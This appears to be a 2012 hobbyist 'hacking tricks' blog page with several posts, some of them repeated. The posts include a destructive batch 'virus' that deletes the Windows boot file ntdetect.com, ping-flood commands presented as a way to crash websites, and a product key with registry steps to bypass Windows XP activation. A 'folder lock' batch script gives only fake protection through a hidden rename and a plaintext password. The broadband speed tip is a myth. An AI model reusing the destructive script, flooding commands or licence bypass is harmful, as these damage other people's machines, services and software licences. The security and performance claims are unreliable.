Saturday, November 10, 2012
FOLDER LOCK WITHOUT USING ANY S/W
Folder Lock Without Using any Software
Open Notepad & copy this Code :
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== Your Password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Now before Saving it .. You will find "Your Password " in the code .. there you can enter
your password & Then Save it as " Lock.bat "
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== Your Password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Now before Saving it .. You will find "Your Password " in the code .. there you can enter
your password & Then Save it as " Lock.bat "
A ROBO WRITING FOR U
A Robo Writing For U
How do u feel when some robo is writing for u ,it would be awesome .... So try this code ,the robo will write for u
Code :
Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "H"
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400
wshshell.sendkeys " "
wscript.sleep 400
wshshell.sendkeys "R"
wscript.sleep 400
wshshell.sendkeys "A"
wscript.sleep 400
wshshell.sendkeys "V"
wscript.sleep 400
wshshell.sendkeys "I"
wscript.sleep 400
VIRUS TO TURNOFF PC FOREVER AND EVER
Virus To Shutdown A PC Forever
Step 1 : Open the Notepad and Copy this code in it
Code :
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print Ur PC is Hacked by Me
Step 2 : Save it as " shut.bat " .. This Virus will shutdown the PC and never opens again because it deletes the " OS Booting Files "So never try it in your PC or illegally ...
DISABLE / ENABLE RUN 4M PC
Disable or Enable Run From PC
When i was trying for a new hack , i
just wanted to use the " run " to open cmd .. So i got an idea that to
disable the run only itself .... So Follow my steps to Disable Run
Step 1 : Start->Run->gpedit.msc->User Configuration->Adminstrator Templates->Start Menu & Taskbar->Remove Run menu from start menu
Step 2 : Now you will find the Remove Run from Start Menu then Double click on the Remove Run and disable the Run from the Start Menu
Step 3 : Now If you want the Run again then just change the Disable to Enable and again use your Run .... Try it in your friends PC
Step 1 : Start->Run->gpedit.msc->User Configuration->Adminstrator Templates->Start Menu & Taskbar->Remove Run menu from start menu
Step 2 : Now you will find the Remove Run from Start Menu then Double click on the Remove Run and disable the Run from the Start Menu
Step 3 : Now If you want the Run again then just change the Disable to Enable and again use your Run .... Try it in your friends PC
HOW TO MAKE WINDOWS XP GENUINE
How To Make Windows XP Genuine
Many of my friends were using Windows XP & had a problem called Genuine ..... So try this trick to make your Windows XP genuine .... Follow My steps .....
1) start > run > " regedit "
2) go to this path in it as shown
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer
.... and doubleclick on it .... add any words you want at alphanumeric (Eg : RAVI ) ... then press ok and exit the Regedit.
3) Now Goto Start > Run > Copy this code in it
Code : " %systemroot%\system32\oobe\msoobe.exe /a "
4) Now you will get the activation screen & click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this
Key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ
then click update it will return back..this mean it was updated & Restart your PC .... Now Ur Windows XP is Genuine
CRASH A SITE USING COMMAND PROMPT
Crash A Site Using CMD
If you want to Crash a site , they are many ways to do ... But the Simple way is to Use Cmd ... So follow my steps ...
Step 1 : Start > Run > Cmd ....
Step 2 : Now You need to find the IP Address of the Site you want to Crash .... It can be know by using a command called " ping " ....
Code : c:\ ping website
Example : c:\ ping mindjolt.com
Step 3 : Now you will get the IP Address of the Site & by using this IP you can Crash the Site .... Now type this code to crash the site
Code : c:\ ping site-ip -t -l 1000
Example : c:\ ping 97.64.112.229 -t -l 1000
Step 4 : Now wait for some time to crash it ... Similarly if you try this code in different PC's at the same time then it could be easy to crash it ....
Step 5 : Similarly you can crash the " Server " by using the same code with few modifications ........
Code : c:\ ping site-ip -l 65500 -n 10000 -w 0.00001
Example : c:\ ping 192.127.1.45 -l 65500 -n 10000 -w 0.00001
Step 6 : Now by using a simple ping command you can Crash a Site
Step 1 : Start > Run > Cmd ....
Step 2 : Now You need to find the IP Address of the Site you want to Crash .... It can be know by using a command called " ping " ....
Code : c:\ ping website
Example : c:\ ping mindjolt.com
Step 3 : Now you will get the IP Address of the Site & by using this IP you can Crash the Site .... Now type this code to crash the site
Code : c:\ ping site-ip -t -l 1000
Example : c:\ ping 97.64.112.229 -t -l 1000
Step 4 : Now wait for some time to crash it ... Similarly if you try this code in different PC's at the same time then it could be easy to crash it ....
Step 5 : Similarly you can crash the " Server " by using the same code with few modifications ........
Code : c:\ ping site-ip -l 65500 -n 10000 -w 0.00001
Example : c:\ ping 192.127.1.45 -l 65500 -n 10000 -w 0.00001
Step 6 : Now by using a simple ping command you can Crash a Site
DO U WANNA INCREASE YOUR BROADBAND SPEED
How To Increase Broadband Speed
They are many ways to Increase your
Broadband Speed ..... This is a Simple Trick where you can Increase high
Speed Internet ... You just need to follow my Steps ........
Step 1 : Goto Run and type this code " gpedit.msc "
Step 2 : You will get a Registry and Select " Computer Configuration " and Expand the [Administrative Templates] > [Network] > [QoS Packet Scheduler] .....
Step 3 : Now Double-click [Limit Reservable Bandwidth] and you need to [Enabled] it and then Change [Bandwidth limit %] to 0 % and Click [OK] Button.
Step 1 : Goto Run and type this code " gpedit.msc "
Step 2 : You will get a Registry and Select " Computer Configuration " and Expand the [Administrative Templates] > [Network] > [QoS Packet Scheduler] .....
Step 3 : Now Double-click [Limit Reservable Bandwidth] and you need to [Enabled] it and then Change [Bandwidth limit %] to 0 % and Click [OK] Button.
Step 4 : Now Need to Restart you PC and then Check your Broadband Speed .........
Subscribe to:
Posts (Atom)